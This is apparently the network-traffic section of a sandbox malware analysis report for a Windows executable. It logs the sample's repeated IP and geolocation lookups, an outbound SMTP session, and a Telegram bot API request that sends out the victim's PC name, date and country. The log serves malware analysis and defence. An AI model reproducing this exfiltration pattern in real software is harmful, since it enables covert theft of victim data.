Oct 1, 2024 10:55:31.730093002 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 08:55:31 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2285d6b6ab9c1fd7caad0766399d0c58 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49735	193.122.6.168	80	7308	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:32.409847975 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 1, 2024 10:55:33.043318987 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 08:55:32 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: eedd2e58a59fbc8f1c6c5eb76f496b84 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49738	193.122.6.168	80	7308	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:33.658849001 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 1, 2024 10:55:34.303560972 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 08:55:34 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c29a497e8542ecbbbc111c4d39b3a77b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49742	193.122.6.168	80	7308	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:35.178710938 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 1, 2024 10:55:35.806416035 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 08:55:35 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4b747f33e174d61c1a924f1f74e73aa7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49708	188.114.97.3	443	7308	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 08:55:01 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-01 08:55:01 UTC	666	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 08:55:01 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: EXPIRED Last-Modified: Tue, 01 Oct 2024 08:55:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NnQoqUBdXA773punbhnYTLyyoPijVqkusFZWyNdM2%2BqpBbXvOmiPicCCG7sfKpLKj0ZMHqIgZNs0x4mX8RtIeboSLdmO3LYroGonR%2BT5tDxanOzXrawjlSeV2HDuAcl8agG2gyJD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cbb3b3a5e07de93-EWR
2024-10-01 08:55:01 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 08:55:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49711	188.114.97.3	443	7308	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 08:55:04 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-01 08:55:04 UTC	678	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 08:55:04 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 3 Last-Modified: Tue, 01 Oct 2024 08:55:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7k9upb3SlbWOgB5R9jN%2BJAx34KE0bxHc9RrwVhH%2FX%2F6t7YKklYJEKyANDC4ddE8muyMYiSjcNV2y%2BZmc2GdenZ8q6aw0%2FQgr%2FlOus0wgO5fS3yFtjm0Jls6tigxVNbA5NbAWZIuk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cbb3b4e2df4c434-EWR
2024-10-01 08:55:04 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 08:55:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49721	188.114.97.3	443	7308	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 08:55:16 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-01 08:55:16 UTC	673	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 08:55:16 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 15 Last-Modified: Tue, 01 Oct 2024 08:55:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1jOteGyE9YVx%2BkgfreCt2fRdd4joL%2BsRMPmInu5N4ZcLWwK8yHAV3eQ2mUbrzJrWmJMbqzLbD7ZnbU7eQVoSoSgpeIsWUaIpHnCznz%2Bi4Mu91bGYDyskDbwUo6RgsrGqTcDeWoL6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cbb3b99880e4402-EWR
2024-10-01 08:55:16 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 08:55:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49728	188.114.97.3	443	7308	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 08:55:28 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-01 08:55:29 UTC	673	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 08:55:29 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 28 Last-Modified: Tue, 01 Oct 2024 08:55:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j14Xerq2zaJpHpTbA2j3EglTD5Ce%2FR6ORSQxsfv5cyUMi5yCsvMVQLxeVidxWtdgvTQ4m7tcmkEAPVVrC3qO8Aqdfylep139gNLM11EWWVqDzHpZxUTkz7O8vz2%2F0y7cE%2B92HXo7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cbb3be66e6942fd-EWR
2024-10-01 08:55:29 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 08:55:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49734	188.114.97.3	443	7308	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 08:55:32 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-01 08:55:32 UTC	671	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 08:55:32 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 31 Last-Modified: Tue, 01 Oct 2024 08:55:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U2ouPpv9Ma7nLraVcaEKvwCDl5X%2FyHvc%2B2Tg8i0lsPOMixtAFQoHx0Ax8za2oaWxo032z7RF5ICyj07zfbxedy99q70mEygKIsTZNBwWdHbLeUc9L30zD1O5CjXCpwKAAyIboQeg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cbb3bfad84e6a5f-EWR
2024-10-01 08:55:32 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 08:55:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49736	188.114.97.3	443	7308	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 08:55:33 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-01 08:55:33 UTC	679	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 08:55:33 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 32 Last-Modified: Tue, 01 Oct 2024 08:55:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=evb4DuVI%2FLRL5PQY3NOa0FjGcavqIHk9o%2BXFR%2F5mavo7Kg7SNJud4O93U%2B6N0CgTboCOnwuYYi1rJ2YtjlqGDu%2FMZTERike%2F34YfYQhfiafLsIH7m3vOWCzoNyOezljBkxGNYaW3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cbb3c02fa468cdd-EWR
2024-10-01 08:55:33 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 08:55:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49739	188.114.97.3	443	7308	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 08:55:34 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-01 08:55:34 UTC	671	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 08:55:34 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 33 Last-Modified: Tue, 01 Oct 2024 08:55:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cLnKVL74ndJAdXISjWhKVl9Enb8tstpaKjSwd9i0mW1bgx8%2BuVdwEc0a98wM4fUqP0XYuOYnGiwJymNgq1MA5ZgzM3FVk8Nq%2F3stgOd4N3DsCUlKVY0q0AG992mse8tImb3OleQW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cbb3c0abcb143ee-EWR
2024-10-01 08:55:34 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 08:55:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49743	188.114.97.3	443	7308	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 08:55:36 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-01 08:55:36 UTC	669	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 08:55:36 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 35 Last-Modified: Tue, 01 Oct 2024 08:55:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YjMz55u1aaIguWuCl5sERJ5om8hAfv7ZCad9P4x90G9VUEsQLoywf4z2s%2BFJw96OcJ0l0XE62UlTrbu8UOZua3by5dDjzdUBBGW6OlESv7ECNGul8BIwCR1Bj3DOQOhXVCJiLqfE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cbb3c1449d75e7d-EWR
2024-10-01 08:55:36 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 08:55:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49744	149.154.167.220	443	7308	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 08:55:37 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20and%20Time:%2002/10/2024%20/%2021:40:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20065367%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-01 08:55:37 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 01 Oct 2024 08:55:37 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-01 08:55:37 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 1, 2024 10:55:43.713464975 CEST	587	49745	75.102.58.14	192.168.2.5	220-sc-europe110.banahosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 10:55:43 +0200 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 10:55:43.713819027 CEST	49745	587	192.168.2.5	75.102.58.14	EHLO 065367
